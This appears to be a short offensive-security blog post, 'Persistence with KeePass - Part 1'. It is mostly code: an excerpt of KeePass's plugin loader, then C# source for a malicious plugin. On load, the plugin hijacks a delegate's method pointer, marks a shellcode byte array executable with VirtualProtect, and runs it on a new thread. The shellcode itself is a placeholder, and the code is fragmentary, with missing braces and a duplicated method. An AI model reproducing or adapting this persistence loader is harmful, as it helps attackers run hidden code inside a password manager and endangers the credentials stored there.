Persistence with KeePass - Part 1

Jun 30 · 6 min read
private static Plugin CreatePluginInstance(string strFilePath,
string strTypeName)
Debug.Assert(strFilePath != null);
if(strFilePath == null) throw new ArgumentNullException("strFilePath");
string strType;
strType = UrlUtil.GetFileName(strFilePath);
strType = UrlUtil.StripExtension(strType) + "." +
UrlUtil.StripExtension(strType) + "Ext";
else strType = strTypeName + "." + strTypeName + "Ext";
ObjectHandle oh = Activator.CreateInstanceFrom(strFilePath, strType);Plugin plugin = (oh.Unwrap() as Plugin);
if(plugin == null) throw new FileLoadException();
return plugin;
using KeePass.Plugins;
using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace KeePassPersistence
public class KeePassPersistenceExt : Plugin
public override bool Initialize(IPluginHost host)
return true;
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
public delegate uint Ret1ArgDelegate(uint address);
static uint PlaceHolder1(uint arg1) { return 0; }
public static byte[] asmBytes = new byte[890] { <shellcode>};
public unsafe void Run()
fixed (byte* startAddress = &asmBytes[0]) // Take the address of our x86 code
// Get the FieldInfo for "_methodPtr"
Type delType = typeof(Delegate);
FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic |
// Set our delegate to our x86 code
Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
_methodPtr.SetValue(del, (IntPtr)startAddress);
//Disable protection
uint outOldProtection;
VirtualProtect((IntPtr)startAddress, (uint)asmBytes.Length, 0x40, out outOldProtection);
// Enjoy
uint n = (uint)0x00000001;
n = del(n);
public override bool Initialize(IPluginHost host){Thread thread = new Thread(Run);thread.Start();return true;}


Purveyor of fine, handcrafted, artisanal cybers.

